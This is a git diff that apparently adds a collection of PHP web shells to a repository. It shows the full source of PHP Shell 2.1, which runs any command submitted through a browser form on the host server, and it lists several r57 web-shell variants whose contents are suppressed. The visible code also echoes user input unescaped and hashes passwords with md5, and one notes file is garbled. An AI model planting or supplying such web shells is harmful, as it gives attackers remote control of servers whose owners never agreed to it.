/* Destroy the session data on the server. This prevents the simple
|
||||||
|
* replay attach where one uses the back button to re-authenticate using
|
||||||
|
* the old POST data since the server wont know the session then.*/
|
||||||
|
// session_destroy();
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
function stripslashes_deep($value) {
|
||||||
|
if (is_array($value))
|
||||||
|
return array_map('stripslashes_deep', $value);
|
||||||
|
else
|
||||||
|
return stripslashes($value);
|
||||||
|
}
|
||||||
|
|
||||||
|
if (get_magic_quotes_gpc())
|
||||||
|
$_POST = stripslashes_deep($_POST);
|
||||||
|
|
||||||
|
/* Initialize some variables we need again and again. */
|
||||||
|
$username = isset($_POST['username']) ? $_POST['username'] : '';
|
||||||
|
$password = isset($_POST['password']) ? $_POST['password'] : '';
|
||||||
|
$nounce = isset($_POST['nounce']) ? $_POST['nounce'] : '';
|
||||||
|
|
||||||
|
$command = isset($_POST['command']) ? $_POST['command'] : '';
|
||||||
|
$rows = isset($_POST['rows']) ? $_POST['rows'] : 24;
|
||||||
|
$columns = isset($_POST['columns']) ? $_POST['columns'] : 80;
|
||||||
|
|
||||||
|
|
||||||
|
/* Load the configuration. */
|
||||||
|
$ini = parse_ini_file('config.php', true);
|
||||||
|
|
||||||
|
if (empty($ini['settings']))
|
||||||
|
$ini['settings'] = array();
|
||||||
|
|
||||||
|
/* Default settings --- these settings should always be set to something. */
|
||||||
|
$default_settings = array('home-directory' => '.');
|
||||||
|
|
||||||
|
/* Merge settings. */
|
||||||
|
$ini['settings'] = array_merge($default_settings, $ini['settings']);
|
||||||
|
|
||||||
|
|
||||||
|
session_start();
|
||||||
|
|
||||||
|
/* Delete the session data if the user requested a logout. This leaves the
|
||||||
|
* session cookie at the user, but this is not important since we
|
||||||
|
* authenticates on $_SESSION['authenticated']. */
|
||||||
|
if (isset($_POST['logout']))
|
||||||
|
logout();
|
||||||
|
|
||||||
|
/* Attempt authentication. */
|
||||||
|
if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] &&
|
||||||
|
isset($ini['users'][$username])) {
|
||||||
|
if (strchr($ini['users'][$username], ':') === false) {
|
||||||
|
// No seperator found, assume this is a password in clear text.
|
||||||
|
$_SESSION['authenticated'] = ($ini['users'][$username] == $password);
|
||||||
|
} else {
|
||||||
|
list($fkt, $salt, $hash) = explode(':', $ini['users'][$username]);
|
||||||
|
$_SESSION['authenticated'] = ($fkt($salt . $password) == $hash);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
/* Enforce default non-authenticated state if the above code didn't set it
|
||||||
|
* already. */
|
||||||
|
if (!isset($_SESSION['authenticated']))
|
||||||
|
$_SESSION['authenticated'] = false;
|
||||||
|
|
||||||
|
|
||||||
|
if ($_SESSION['authenticated']) {
|
||||||
|
/* Initialize the session variables. */
|
||||||
|
if (empty($_SESSION['cwd'])) {
|
||||||
|
$_SESSION['cwd'] = realpath($ini['settings']['home-directory']);
|
||||||
|
$_SESSION['history'] = array();
|
||||||
|
$_SESSION['output'] = '';
|
||||||
|
}
|
||||||
|
|
||||||
|
if (!empty($command)) {
|
||||||
|
/* Save the command for late use in the JavaScript. If the command is
|
||||||
|
* already in the history, then the old entry is removed before the
|
||||||
|
* new entry is put into the list at the front. */
|
||||||
|
if (($i = array_search($command, $_SESSION['history'])) !== false)
|
||||||
|
unset($_SESSION['history'][$i]);
|
||||||
|
|
||||||
|
array_unshift($_SESSION['history'], $command);
|
||||||
|
|
||||||
|
/* Now append the commmand to the output. */
|
||||||
|
$_SESSION['output'] .= '$ ' . $command . "\n";
|
||||||
|
|
||||||
|
/* Initialize the current working directory. */
|
||||||
|
if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $command)) {
|
||||||
|
$_SESSION['cwd'] = realpath($ini['settings']['home-directory']);
|
||||||
|
} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
|
||||||
|
/* The current command is a 'cd' command which we have to handle
|
||||||
|
* as an internal shell command. */
|
||||||
|
|
||||||
|
if ($regs[1]{0} == '/') {
|
||||||
|
/* Absolute path, we use it unchanged. */
|
||||||
|
$new_dir = $regs[1];
|
||||||
|
} else {
|
||||||
|
/* Relative path, we append it to the current working
|
||||||
|
* directory. */
|
||||||
|
$new_dir = $_SESSION['cwd'] . '/' . $regs[1];
|
||||||
|
}
|
||||||
|
|
||||||
|
/* Transform '/./' into '/' */
|
||||||
|
while (strpos($new_dir, '/./') !== false)
|
||||||
|
$new_dir = str_replace('/./', '/', $new_dir);
|
||||||
|
|
||||||
|
/* Transform '//' into '/' */
|
||||||
|
while (strpos($new_dir, '//') !== false)
|
||||||
|
$new_dir = str_replace('//', '/', $new_dir);
|
||||||
|
|
||||||
|
/* Transform 'x/..' into '' */
|
||||||
|
while (preg_match('|/\.\.(?!\.)|', $new_dir))
|
||||||
|
$new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
|
||||||
|
|
||||||
|
if ($new_dir == '') $new_dir = '/';
|
||||||
|
|
||||||
|
/* Try to change directory. */
|
||||||
|
if (@chdir($new_dir)) {
|
||||||
|
$_SESSION['cwd'] = $new_dir;
|
||||||
|
} else {
|
||||||
|
$_SESSION['output'] .= "cd: could not change to: $new_dir\n";
|
||||||
|
}
|
||||||
|
|
||||||
|
} elseif (trim($command) == 'exit') {
|
||||||
|
logout();
|
||||||
|
} else {
|
||||||
|
|
||||||
|
/* The command is not an internal command, so we execute it after
|
||||||
|
* changing the directory and save the output. */
|
||||||
|
chdir($_SESSION['cwd']);
|
||||||
|
|
||||||
|
// We canot use putenv() in safe mode.
|
||||||
|
if (!ini_get('safe_mode')) {
|
||||||
|
// Advice programs (ls for example) of the terminal size.
|
||||||
|
putenv('ROWS=' . $rows);
|
||||||
|
putenv('COLUMNS=' . $columns);
|
||||||
|
}
|
||||||
|
|
||||||
|
/* Alias expansion. */
|
||||||
|
$length = strcspn($command, " \t");
|
||||||
|
$token = substr($command, 0, $length);
|
||||||
|
if (isset($ini['aliases'][$token]))
|
||||||
|
$command = $ini['aliases'][$token] . substr($command, $length);
|
||||||
|
|
||||||
|
$io = array();
|
||||||
|
$p = proc_open($command,
|
||||||
|
array(1 => array('pipe', 'w'),
|
||||||
|
2 => array('pipe', 'w')),
|
||||||
|
$io);
|
||||||
|
|
||||||
|
/* Read output sent to stdout. */
|
||||||
|
while (!feof($io[1])) {
|
||||||
|
$_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
|
||||||
|
ENT_COMPAT, 'UTF-8');
|
||||||
|
}
|
||||||
|
/* Read output sent to stderr. */
|
||||||
|
while (!feof($io[2])) {
|
||||||
|
$_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
|
||||||
|
ENT_COMPAT, 'UTF-8');
|
||||||
|
}
|
||||||
|
|
||||||
|
fclose($io[1]);
|
||||||
|
fclose($io[2]);
|
||||||
|
proc_close($p);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
/* Build the command history for use in the JavaScript */
|
||||||
|
if (empty($_SESSION['history'])) {
|
||||||
|
$js_command_hist = '""';
|
||||||
|
} else {
|
||||||
|
$escaped = array_map('addslashes', $_SESSION['history']);
|
||||||
|
$js_command_hist = '"", "' . implode('", "', $escaped) . '"';
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
?>
|
||||||
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|
||||||
|
"http://www.w3.org/TR/html4/strict.dtd">
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<title>PHP Shell 2.1</title>
|
||||||
|
<link rel="stylesheet" href="style.css" type="text/css">
|
||||||
|
|
||||||
|
<script type="text/javascript">
|
||||||
|
<?php if ($_SESSION['authenticated']) { ?>
|
||||||
|
|
||||||
|
var current_line = 0;
|
||||||
|
var command_hist = new Array(<?php echo $js_command_hist ?>);
|
||||||
|
var last = 0;
|
||||||
|
|
||||||
|
function key(e) {
|
||||||
|
if (!e) var e = window.event;
|
||||||
|
|
||||||
|
if (e.keyCode == 38 && current_line < command_hist.length-1) {
|
||||||
|
command_hist[current_line] = document.shell.command.value;
|
||||||
|
current_line++;
|
||||||
|
document.shell.command.value = command_hist[current_line];
|
||||||
|
}
|
||||||
|
|
||||||
|
if (e.keyCode == 40 && current_line > 0) {
|
||||||
|
command_hist[current_line] = document.shell.command.value;
|
||||||
|
current_line--;
|
||||||
|
document.shell.command.value = command_hist[current_line];
|
||||||
|
}
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
function init() {
|
||||||
|
document.shell.setAttribute("autocomplete", "off");
|
||||||
|
document.shell.output.scrollTop = document.shell.output.scrollHeight;
|
||||||
|
document.shell.command.focus();
|
||||||
|
}
|
||||||
|
|
||||||
|
<?php } else { ?>
|
||||||
|
|
||||||
|
function init() {
|
||||||
|
document.shell.username.focus();
|
||||||
|
}
|
||||||
|
|
||||||
|
<?php } ?>
|
||||||
|
</script>
|
||||||
|
</head>
|
||||||
|
|
||||||
|
<body onload="init()">
|
||||||
|
|
||||||
|
<h1>PHP Shell 2.1</h1>
|
||||||
|
|
||||||
|
<form name="shell" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="post">
|
||||||
|
|
||||||
|
<?php
|
||||||
|
if (!$_SESSION['authenticated']) {
|
||||||
|
/* Genereate a new nounce every time we preent the login page. This binds
|
||||||
|
* each login to a unique hit on the server and prevents the simple replay
|
||||||
|
* attack where one uses the back button in the browser to replay the POST
|
||||||
|
* data from a login. */
|
||||||
|
$_SESSION['nounce'] = mt_rand();
|
||||||
|
|
||||||
|
?>
|
||||||
|
|
||||||
|
<fieldset>
|
||||||
|
<legend>Authentication</legend>
|
||||||
|
|
||||||
|
<?php
|
||||||
|
if (!empty($username))
|
||||||
|
echo ' <p class="error">Login failed, please try again:</p>' . "\n";
|
||||||
|
else
|
||||||
|
echo " <p>Please login:</p>\n";
|
||||||
|
?>
|
||||||
|
|
||||||
|
<p>Username: <input name="username" type="text" value="<?php echo $username
|
||||||
|
?>"></p>
|
||||||
|
|
||||||
|
<p>Password: <input name="password" type="password"></p>
|
||||||
|
|
||||||
|
<p><input type="submit" value="Login"></p>
|
||||||
|
|
||||||
|
<input name="nounce" type="hidden" value="<?php echo $_SESSION['nounce']; ?>">
|
||||||
|
|
||||||
|
</fieldset>
|
||||||
|
|
||||||
|
<?php } else { /* Authenticated. */ ?>
|
||||||
|
|
||||||
|
<fieldset>
|
||||||
|
<legend>Current Working Directory: <code><?php
|
||||||
|
echo htmlspecialchars($_SESSION['cwd'], ENT_COMPAT, 'UTF-8');
|
||||||
|
?></code></legend>
|
||||||
|
|
||||||
|
|
||||||
|
<div id="terminal">
|
||||||
|
<textarea name="output" readonly="readonly" cols="<?php echo $columns ?>" rows="<?php echo $rows ?>">
|
||||||
|
<?php
|
||||||
|
$lines = substr_count($_SESSION['output'], "\n");
|
||||||
|
$padding = str_repeat("\n", max(0, $rows+1 - $lines));
|
||||||
|
echo rtrim($padding . $_SESSION['output']);
|
||||||
|
?>
|
||||||
|
</textarea>
|
||||||
|
<p id="prompt">
|
||||||
|
$ <input name="command" type="text"
|
||||||
|
onkeyup="key(event)" size="<?php echo $columns-2 ?>" tabindex="1">
|
||||||
|
</p>
|
||||||
|
</div>
|
||||||
|
|
||||||
|
<p>
|
||||||
|
<span style="float: right">Size: <input type="text" name="rows" size="2"
|
||||||
|
maxlength="3" value="<?php echo $rows ?>"> × <input type="text"
|
||||||
|
name="columns" size="2" maxlength="3" value="<?php echo $columns
|
||||||
|
?>"></span>
|
||||||
|
|
||||||
|
<input type="submit" value="Execute Command">
|
||||||
|
<input type="submit" name="logout" value="Logout">
|
||||||
|
</p>
|
||||||
|
|
||||||
|
</fieldset>
|
||||||
|
|
||||||
|
<?php } ?>
|
||||||
|
|
||||||
|
</form>
|
||||||
|
|
||||||
|
|
||||||
|
<hr>
|
||||||
|
|
||||||
|
<p>Please consult the <a href="README">README</a>, <a
|
||||||
|
href="INSTALL">INSTALL</a>, and <a href="SECURITY">SECURITY</a> files for
|
||||||
|
instruction on how to use PHP Shell.</p>
|
||||||
|
|
||||||
|
<hr>
|
||||||
|
|
||||||
|
<address>
|
||||||
|
Copyright © 2000–2005, <a
|
||||||
|
href="mailto:mgeisler@mgeisler.net">Martin Geisler</a>. Get the
|
||||||
|
latest version at <a
|
||||||
|
href="http://mgeisler.net/php-shell/">mgeisler.net/php-shell/</a>.
|
||||||
|
</address>
|
||||||
|
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
100
php/PHPshell/【phpshell-2.1】/pwhash.php
Normal file
100
php/PHPshell/【phpshell-2.1】/pwhash.php
Normal file
@@ -0,0 +1,100 @@
|
|||||||
|
<?php
|
||||||
|
/*
|
||||||
|
* pwhash.php file for PHP Shell 2.1
|
||||||
|
* Copyright (C) 2005 Martin Geisler <mgeisler@mgeisler.net>
|
||||||
|
* Licensed under the GNU GPL. See the file COPYING for details.
|
||||||
|
*/
|
||||||
|
|
||||||
|
function stripslashes_deep($value) {
|
||||||
|
if (is_array($value))
|
||||||
|
return array_map('stripslashes_deep', $value);
|
||||||
|
else
|
||||||
|
return stripslashes($value);
|
||||||
|
}
|
||||||
|
|
||||||
|
if (get_magic_quotes_gpc())
|
||||||
|
$_POST = stripslashes_deep($_POST);
|
||||||
|
|
||||||
|
$username = isset($_POST['username']) ? $_POST['username'] : '';
|
||||||
|
$password = isset($_POST['password']) ? $_POST['password'] : '';
|
||||||
|
|
||||||
|
?>
|
||||||
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|
||||||
|
"http://www.w3.org/TR/html4/strict.dtd">
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<title>Password Hasher for PHP Shell 2.1</title>
|
||||||
|
<link rel="stylesheet" href="style.css" type="text/css">
|
||||||
|
</head>
|
||||||
|
|
||||||
|
<body>
|
||||||
|
|
||||||
|
<h1>Password Hasher for PHP Shell 2.1</h1>
|
||||||
|
|
||||||
|
<form action="<?php $_SERVER['PHP_SELF']; ?>" method="POST">
|
||||||
|
|
||||||
|
<fieldset>
|
||||||
|
<legend>Username</legend>
|
||||||
|
<input name="username" type="text" value="<?php echo $username ?>">
|
||||||
|
</fieldset>
|
||||||
|
|
||||||
|
<fieldset>
|
||||||
|
<legend>Password</legend>
|
||||||
|
<input name="password" type="text" value="<?php echo $password ?>">
|
||||||
|
</fieldset>
|
||||||
|
|
||||||
|
<fieldset>
|
||||||
|
<legend>Result</legend>
|
||||||
|
|
||||||
|
<?php
|
||||||
|
if ($username == '' || $password == '') {
|
||||||
|
echo " <p><i>Enter a username and a password and update.</i></p>\n";
|
||||||
|
} else {
|
||||||
|
|
||||||
|
$u = strtolower($username);
|
||||||
|
|
||||||
|
if (preg_match('/[[ |&~!()]/', $u) || $u == 'null' ||
|
||||||
|
$u == 'yes' || $u == 'no' || $u == 'true' || $u == 'false') {
|
||||||
|
|
||||||
|
echo ' <p class="error">Your username cannot contain any of the following reserved
|
||||||
|
word: "<tt>null</tt>", "<tt>yes</tt>", "<tt>no</tt>", "<tt>true</tt>", or
|
||||||
|
"<tt>false</tt>". The following characters are also prohibited:
|
||||||
|
"<tt> </tt>" (space), "<tt>[</tt>" (left bracket), "<tt>|</tt>" (pipe),
|
||||||
|
"<tt>&</tt>" (ampersand), "<tt>~</tt>" (tilde), "<tt>!</tt>" (exclamation
|
||||||
|
mark), "<tt>(</tt>" (left parenthesis), or "<tt>)</tt>" (right
|
||||||
|
parenthesis).</p>' . "\n";
|
||||||
|
|
||||||
|
echo ' <p>Please choose another username and try again.</p>' . "\n";
|
||||||
|
|
||||||
|
} else {
|
||||||
|
echo " <p>Write the following line into <tt>config.php</tt> " .
|
||||||
|
"in the <tt>users</tt> section:</p>\n";
|
||||||
|
|
||||||
|
$fkt = 'md5'; // Change to sha1 is you feel like it...
|
||||||
|
$salt = dechex(mt_rand());
|
||||||
|
|
||||||
|
$hash = $fkt . ':' . $salt . ':' . $fkt($salt . $password);
|
||||||
|
|
||||||
|
echo "<pre>\n";
|
||||||
|
echo htmlentities(str_pad($username, 8) . ' = "' . $hash . '"') . "\n";
|
||||||
|
echo "</pre>\n";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
?>
|
||||||
|
|
||||||
|
<p><input type="submit" value="Update"></p>
|
||||||
|
|
||||||
|
</fieldset>
|
||||||
|
|
||||||
|
</form>
|
||||||
|
|
||||||
|
|
||||||
|
<hr>
|
||||||
|
|
||||||
|
<address>
|
||||||
|
Copyright © 2005, <a href="mailto:mgeisler@mgeisler.net">Martin Geisler</a>. Get the
|
||||||
|
latest version at <a href="http://mgeisler.net/php-shell/">mgeisler.net/php-shell/</a>.
|
||||||
|
</address>
|
||||||
|
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
58
php/PHPshell/【phpshell-2.1】/style.css
Normal file
58
php/PHPshell/【phpshell-2.1】/style.css
Normal file
@@ -0,0 +1,58 @@
|
|||||||
|
/* style.css file for PHP Shell 2.1
|
||||||
|
* Copyright (C) 2003-2005 Martin Geisler <mgeisler@mgeisler.net>
|
||||||
|
* Licensed under the GNU GPL. See the file COPYING for details.
|
||||||
|
*/
|
||||||
|
|
||||||
|
body {
|
||||||
|
font-family: sans-serif;
|
||||||
|
color: black;
|
||||||
|
background: white;
|
||||||
|
}
|
||||||
|
|
||||||
|
h1 {
|
||||||
|
color: red;
|
||||||
|
background: white;
|
||||||
|
}
|
||||||
|
|
||||||
|
img {
|
||||||
|
border: none;
|
||||||
|
}
|
||||||
|
|
||||||
|
div#terminal {
|
||||||
|
border: inset 2px red;
|
||||||
|
padding: 2px;
|
||||||
|
margin-top: 0.5em;
|
||||||
|
}
|
||||||
|
|
||||||
|
div#terminal textarea {
|
||||||
|
font-size: 100%;
|
||||||
|
width: 100%;
|
||||||
|
border: none;
|
||||||
|
}
|
||||||
|
|
||||||
|
p {
|
||||||
|
margin-top: 0.5em;
|
||||||
|
margin-bottom: 0.5em;
|
||||||
|
}
|
||||||
|
|
||||||
|
p#prompt {
|
||||||
|
font-family: monospace;
|
||||||
|
margin: 0px;
|
||||||
|
}
|
||||||
|
|
||||||
|
p#prompt input {
|
||||||
|
border: none;
|
||||||
|
font-family: monospace;
|
||||||
|
}
|
||||||
|
|
||||||
|
legend {
|
||||||
|
padding-right: 0.5em;
|
||||||
|
}
|
||||||
|
|
||||||
|
fieldset {
|
||||||
|
padding: 0.5em;
|
||||||
|
}
|
||||||
|
|
||||||
|
.error {
|
||||||
|
color: red;
|
||||||
|
}
|
||||||
1
php/PHPshell/【phpshell-2.1】/备注.txt
Normal file
1
php/PHPshell/【phpshell-2.1】/备注.txt
Normal file
@@ -0,0 +1 @@
|
|||||||
|
<EFBFBD>轫<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><EFBFBD>ϴ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ſ<EFBFBD>ʹ<EFBFBD><EFBFBD>
|
||||||
BIN
php/PHPshell/【r57_Mohajer22】/r57_Mohajer22.jpg
Normal file
BIN
php/PHPshell/【r57_Mohajer22】/r57_Mohajer22.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 109 KiB |
2369
php/PHPshell/【r57_Mohajer22】/r57_Mohajer22.php
Normal file
2369
php/PHPshell/【r57_Mohajer22】/r57_Mohajer22.php
Normal file
File diff suppressed because it is too large
Load Diff
BIN
php/PHPshell/【r57_Mohajer22】/r57_Mohajer222.jpg
Normal file
BIN
php/PHPshell/【r57_Mohajer22】/r57_Mohajer222.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 86 KiB |
BIN
php/PHPshell/【r57_iFX】/r57.jpg
Normal file
BIN
php/PHPshell/【r57_iFX】/r57.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 78 KiB |
BIN
php/PHPshell/【r57_iFX】/r572.jpg
Normal file
BIN
php/PHPshell/【r57_iFX】/r572.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 82 KiB |
1917
php/PHPshell/【r57_iFX】/r57_iFX.php
Normal file
1917
php/PHPshell/【r57_iFX】/r57_iFX.php
Normal file
File diff suppressed because it is too large
Load Diff
BIN
php/PHPshell/【r57_karta】/r57_kartal.jpg
Normal file
BIN
php/PHPshell/【r57_karta】/r57_kartal.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 81 KiB |
1883
php/PHPshell/【r57_karta】/r57_kartal.php
Normal file
1883
php/PHPshell/【r57_karta】/r57_kartal.php
Normal file
File diff suppressed because it is too large
Load Diff
BIN
php/PHPshell/【r57_karta】/r57_kartal2.jpg
Normal file
BIN
php/PHPshell/【r57_karta】/r57_kartal2.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 67 KiB |
BIN
php/PHPshell/【r57】/r57.jpg
Normal file
BIN
php/PHPshell/【r57】/r57.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 92 KiB |
2295
php/PHPshell/【r57】/r57.php
Normal file
2295
php/PHPshell/【r57】/r57.php
Normal file
File diff suppressed because it is too large
Load Diff
BIN
php/PHPshell/【r57】/r572.jpg
Normal file
BIN
php/PHPshell/【r57】/r572.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 65 KiB |
Reference in New Issue
Block a user